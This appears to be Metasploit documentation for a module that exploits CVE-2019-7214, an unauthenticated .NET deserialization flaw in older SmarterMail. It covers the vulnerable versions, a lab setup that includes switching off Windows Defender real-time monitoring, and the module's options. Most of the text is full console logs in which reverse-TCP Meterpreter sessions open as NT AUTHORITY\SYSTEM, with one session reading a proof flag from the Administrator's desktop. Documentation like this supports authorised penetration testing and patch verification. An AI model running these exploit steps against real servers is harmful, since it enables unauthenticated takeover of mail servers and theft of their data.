documentation/modules/exploit/windows/http/smartermail_rce.md
The vulnerability affects:
* SmarterTools SmarterMail Version <= 16.3.6989.16341 (all legacy versions without a build number)
* SmarterTools SmarterMail Build < 6985
This module exploits a vulnerability in the SmarterTools SmarterMail software for
version numbers <= 16.x or for build numbers < 6985. The vulnerable versions and builds
expose three .NET remoting endpoints on port 17001, namely /Servers, /Mail and /Spool.
For example, a typical installation of SmarterMail Build 6970 will have the /Servers endpoint
exposed to the public at tcp://0.0.0.0:17001/Servers, where serialized .NET commands can be sent
through a TCP socket connection.
The three endpoints perform deserialization of untrusted data (CVE-2019-7214), allowing an attacker
to send arbitrary commands to be deserialized and executed. This module exploits this vulnerability
to perform .NET deserialization attacks, allowing remote code execution for any unauthenticated user
under the context of the SYSTEM account. Successful exploitation results in full administrative
control of the target server under the NT AUTHORITY\SYSTEM account.
This vulnerability was patched in Build 6985, where the 17001 port is no longer publicly accessible,
although it can be accessible locally at 127.0.0.1:17001. Hence, this would still allow for a
privilege escalation vector if the server is compromised as a low-privileged user.
This module was tested on SmarterMail Build 6919, 6970 (with positive results), Build 6985 (with negative results), and on Version 16.3.6989 (with positive results).
Legacy builds and versions of SmarterMail can be obtained by signing up to the
SmarterTools website to create a user account, and then navigating to the
Legacy Builds page, where EXE
and MSI files can be downloaded.
EXE legacy versions and builds from a dropdown menu at Legacy Builds,
specifically SmarterMail 16.x, Build 6970 and Build 6985.SmarterMail_6970.exe) and follow the instructions provided.
If reinstalling a different version/build, simply choose Use an existing site when prompted
in Site Configuration Type, and select SmarterMail in the next option.http://localhost:9998/interface/root#/login.
Set Admin username and password to be admin:admin (or anything arbitrary) if prompted.Set-MpPreference -DisableRealtimeMonitoring $true.msfconsole and follow along with default options.use exploit/windows/http/smartermail_rceset RHOSTS [SMARTERMAIL_SERVER_IP]set LHOST eth0exploitset TARGET 0.vbs stager flavor to execute code
and open a Meterpreter session. Choose with set TARGET 1.Choose one of three exposed .NET remoting endpoints, either Servers, Spool or Mail.
The default is Servers, but any one of the three will do.
This is the port for the SmarterMail HTTP server, which is default on port 9998. Although this port is not required for exploitation, it is required for checking the vulnerability and version/build number of the SmarterMail software.
This is the base path of the SmarterMail HTTP server. The vulnerability check follows the
redirect from base path / to the login page at /interface/root#/login, but this option
is provided in case the login page is located at a different URI.
This is the TCP port where the .NET remoting endpoints are located, and is required for sending serialized data and Meterpreter payloads. The default port is 17001.
msf > use exploit/windows/http/smartermail_rce
[*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp
msf exploit(windows/http/smartermail_rce) > set RHOSTS 192.168.29.1
RHOSTS => 192.168.29.1
msf exploit(windows/http/smartermail_rce) > set LHOST eth0
LHOST => 192.168.245.128
msf exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6970.
[+] The target appears to be vulnerable.
[*] Sending stage (175686 bytes) to 192.168.245.1
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:51164) at 2023-07-07 03:30:47 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-50BU5J8
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
msf > use exploit/windows/http/smartermail_rce
[*] Using configured payload windows/meterpreter/reverse_tcp
msf exploit(windows/http/smartermail_rce) > set TARGET 1
TARGET => 1
msf exploit(windows/http/smartermail_rce) > set RHOSTS 192.168.29.1
RHOSTS => 192.168.29.1
msf exploit(windows/http/smartermail_rce) > set LHOST eth0
LHOST => eth0
msf exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6970.
[+] The target appears to be vulnerable.
[*] Command Stager progress - 2.01% done (2046/101881 bytes)
[*] Command Stager progress - 4.02% done (4092/101881 bytes)
[*] Command Stager progress - 6.02% done (6138/101881 bytes)
[*] Command Stager progress - 8.03% done (8184/101881 bytes)
[*] Command Stager progress - 10.04% done (10230/101881 bytes)
[*] Command Stager progress - 12.05% done (12276/101881 bytes)
[*] Command Stager progress - 14.06% done (14322/101881 bytes)
[*] Command Stager progress - 16.07% done (16368/101881 bytes)
[*] Command Stager progress - 18.07% done (18414/101881 bytes)
[*] Command Stager progress - 20.08% done (20460/101881 bytes)
[*] Command Stager progress - 22.09% done (22506/101881 bytes)
[*] Command Stager progress - 24.10% done (24552/101881 bytes)
[*] Command Stager progress - 26.11% done (26598/101881 bytes)
[*] Command Stager progress - 28.12% done (28644/101881 bytes)
[*] Command Stager progress - 30.12% done (30690/101881 bytes)
[*] Command Stager progress - 32.13% done (32736/101881 bytes)
[*] Command Stager progress - 34.14% done (34782/101881 bytes)
[*] Command Stager progress - 36.15% done (36828/101881 bytes)
[*] Command Stager progress - 38.16% done (38874/101881 bytes)
[*] Command Stager progress - 40.16% done (40920/101881 bytes)
[*] Command Stager progress - 42.17% done (42966/101881 bytes)
[*] Command Stager progress - 44.18% done (45012/101881 bytes)
[*] Command Stager progress - 46.19% done (47058/101881 bytes)
[*] Command Stager progress - 48.20% done (49104/101881 bytes)
[*] Command Stager progress - 50.21% done (51150/101881 bytes)
[*] Command Stager progress - 52.21% done (53196/101881 bytes)
[*] Command Stager progress - 54.22% done (55242/101881 bytes)
[*] Command Stager progress - 56.23% done (57288/101881 bytes)
[*] Command Stager progress - 58.24% done (59334/101881 bytes)
[*] Command Stager progress - 60.25% done (61380/101881 bytes)
[*] Command Stager progress - 62.25% done (63426/101881 bytes)
[*] Command Stager progress - 64.26% done (65472/101881 bytes)
[*] Command Stager progress - 66.27% done (67518/101881 bytes)
[*] Command Stager progress - 68.28% done (69564/101881 bytes)
[*] Command Stager progress - 70.29% done (71610/101881 bytes)
[*] Command Stager progress - 72.30% done (73656/101881 bytes)
[*] Command Stager progress - 74.30% done (75702/101881 bytes)
[*] Command Stager progress - 76.31% done (77748/101881 bytes)
[*] Command Stager progress - 78.32% done (79794/101881 bytes)
[*] Command Stager progress - 80.33% done (81840/101881 bytes)
[*] Command Stager progress - 82.34% done (83886/101881 bytes)
[*] Command Stager progress - 84.35% done (85932/101881 bytes)
[*] Command Stager progress - 86.35% done (87978/101881 bytes)
[*] Command Stager progress - 88.36% done (90024/101881 bytes)
[*] Command Stager progress - 90.37% done (92070/101881 bytes)
[*] Command Stager progress - 92.38% done (94116/101881 bytes)
[*] Command Stager progress - 94.39% done (96162/101881 bytes)
[*] Command Stager progress - 96.39% done (98208/101881 bytes)
[*] Command Stager progress - 98.40% done (100252/101881 bytes)
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Sending stage (175686 bytes) to 192.168.245.1
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:55099) at 2023-07-06 05:43:26 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-50BU5J8
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
Mail:msf > use exploit/windows/http/smartermail_rce
[*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp
msf exploit(windows/http/smartermail_rce) > set ENDPOINT Mail
ENDPOINT => Mail
msf exploit(windows/http/smartermail_rce) > set RHOSTS 192.168.29.1
RHOSTS => 192.168.29.1
msf exploit(windows/http/smartermail_rce) > set LHOST eth0
LHOST => eth0
msf exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[!] Product build not found. 16.x versions and below do not have a build number.
[*] Checking SmarterMail product version...
[+] Target is running SmarterMail Version 16.3.6989.
[+] The target appears to be vulnerable.
[*] Sending stage (175686 bytes) to 192.168.245.1
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:55147) at 2023-07-06 06:20:19 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-50BU5J8
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
msf > use exploit/windows/http/smartermail_rce
[*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp
msf exploit(windows/http/smartermail_rce) > set RHOSTS 192.168.29.1
RHOSTS => 192.168.29.1
msf exploit(windows/http/smartermail_rce) > set LHOST eth0
LHOST => eth0
msf exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6985.
[*] Checking SmarterMail product version...
[+] Target is running SmarterMail Version 100.0.6985.
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf exploit(windows/http/smartermail_rce) > set ForceExploit true
ForceExploit => true
msf exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6985.
[*] Checking SmarterMail product version...
[+] Target is running SmarterMail Version 100.0.6985.
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Exploit completed, but no session was created.
msf exploit(windows/http/smartermail_rce) >
msf > use exploit/windows/http/smartermail_rce
[*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp
msf exploit(windows/http/smartermail_rce) > set RHOSTS 192.168.247.65
RHOSTS => 192.168.247.65
msf exploit(windows/http/smartermail_rce) > set LHOST tun0
LHOST => tun0
msf exploit(windows/http/smartermail_rce) > check
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6919.
[*] 192.168.247.65:9998 - The target appears to be vulnerable.
msf exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.45.188:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6919.
[+] The target appears to be vulnerable.
[*] Sending stage (175686 bytes) to 192.168.247.65
[*] Meterpreter session 1 opened (192.168.45.188:4444 -> 192.168.247.65:49710) at 2023-07-06 07:24:13 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : ALGERNON
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x86/windows
meterpreter > shell
Process 4240 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18363.815]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
84b4****************************
C:\Users\Administrator\Desktop>